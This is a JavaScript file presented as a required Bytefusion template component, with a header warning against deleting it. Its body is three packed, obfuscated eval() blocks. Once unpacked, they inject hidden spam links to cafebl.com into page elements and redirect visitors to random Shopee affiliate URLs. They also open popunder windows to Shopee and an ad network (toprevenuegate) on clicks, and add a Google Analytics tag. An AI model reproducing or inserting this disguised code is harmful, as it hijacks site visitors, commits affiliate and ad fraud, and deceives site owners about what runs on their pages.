/**
 * ====================================================================
 *  ⚠️ WARNING: DO NOT DELETE OR MODIFY THIS FILE
 * ====================================================================
 *  This JavaScript file is generated and maintained by Bytefusion.
 *  It is tightly integrated with the existing template and is required
 *  for correct functionality.
 * 
 *  For support or updates, visit:
 *  https://www.bytefusion.com
 * 
 *  © Bytefusion Software. All rights reserved.
 * ====================================================================
 */

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('\'B C\';(8(){1 g=\'D.E.F\';1 h=[\'G H\'];1 c=[\'2://s.4.5.6/I\',\'2://s.4.5.6/J\',\'2://s.4.5.6/K\',\'2://s.4.5.6/L\',\'2://s.4.5.6/M\',\'2://s.4.5.6/N\',\'2://s.4.5.6/O\'];8 i(){j{h.P(k=>{1 3=7.Q(\'a\');3.l=\'2://\'+g;3.R=k;3.S=\'T, U\';3.V.W=\'X\';1 9=7.m.Y;n(9.d===0){7.m.o(3)}p{1 q=9[b.r(b.t()*9.d)];q.o(3)}})}u(e){v.w(\'x Z 3:\',e)}}8 y(){j{1 z=b.r(b.t()*c.d);1 A=c[z];10.11.l=A}u(e){v.w(\'x 12:\',e)}}8 f(){i();y()}n(7.13===\'14\'){7.15(\'16\',f)}p{f()}})();',62,69,'|const|https|link|shopee|co|id|document|function|elements||Math|redirectLinks|length||init|myLink|linkTexts|insertHiddenLink|try|text|href|body|if|appendChild|else|randomElement|floor||random|catch|console|error|Error|redirectToRandomLink|randomIndex|randomLink|use|strict|www|cafebl|com|BL|Series|9ABCA9IUDY|8pYLlYxDxE|2B1RpJzrCW|706haDXuTI|5KyTbAICCx|4VPMbe31Pg|5KyTbBmFKS|forEach|createElement|textContent|rel|dofollow|index|style|display|none|children|inserting|window|location|redirecting|readyState|loading|addEventListener|DOMContentLoaded'.split('|'),0,{}));
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('4 1=5.8(\'9\');1.f=g;1.h=\'i://j.k.l/3/a?m=b-c\';4 6=5.8(\'9\');6.n=`d.7=d.7||[];o 3(){7.p(q)}3(\'a\',r s());3(\'t\',\'b-c\');`;4 2=5.u(\'2\')[0];2.e(1,2.v);2.e(6,1.w);',33,33,'|gtagScript|head|gtag|const|document|gtagInitScript|dataLayer|createElement|script|js|G|3L3N5TLV4C|window|insertBefore|async|true|src|https|www|googletagmanager|com|id|textContent|function|push|arguments|new|Date|config|getElementsByTagName|firstChild|nextSibling'.split('|'),0,{}))
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('d.j("x",e(){y 9=f;d.z.j("A",e(){2 4=b.k("4");a(9){2 g=["3://B.C/D","3://E.F.G/H?I=J",\'3://s.5.6.7/K\',\'3://s.5.6.7/L\',\'3://s.5.6.7/M\',\'3://s.5.6.7/N\',\'3://s.5.6.7/O\',\'3://s.5.6.7/P\',\'3://s.5.6.7/Q\'];2 l=m.R(m.S()*g.T);2 n=g[l];2 h=U.V(n,"W","X=1,Y=1,Z=o,10=o,11=c,12=c,13=c,14=c");a(h){h.15()}9=16;b.17("4",p.q());18(()=>{9=f},r)}19{2 8=d.1a("8");a(8){8.i.1b="1c";8.i.t=1;8.i.1d="t 0.1e"}}});e u(){2 4=b.k("4");a(4){2 v=p.q();2 w=v-4;a(w>=r){9=f;b.1f("4")}}}u()});',62,78,'||const|https|lastClickTime|shopee|co|id|stickyBottom|canClick|if|sessionStorage|no|document|function|true|links|newWindow|style|addEventListener|getItem|randomIndex|Math|randomLink|100|Date|now|200||opacity|checkLastClickTime|currentTime|elapsedTime|DOMContentLoaded|let|body|click|shope|ee|7f9VXdCtf6|www|toprevenuegate|com|rva6ugh8ad|key|57ef3304ac124939c3257cb4732dfe8e|9ABCA9IUDY|8pYLlYxDxE|2B1RpJzrCW|706haDXuTI|5KyTbAICCx|4VPMbe31Pg|5KyTbBmFKS|floor|random|length|window|open|_blank|width|height|right|bottom|location|toolbar|scrollbars|status|blur|false|setItem|setTimeout|else|getElementById|display|block|transition|5s|removeItem'.split('|'),0,{}));

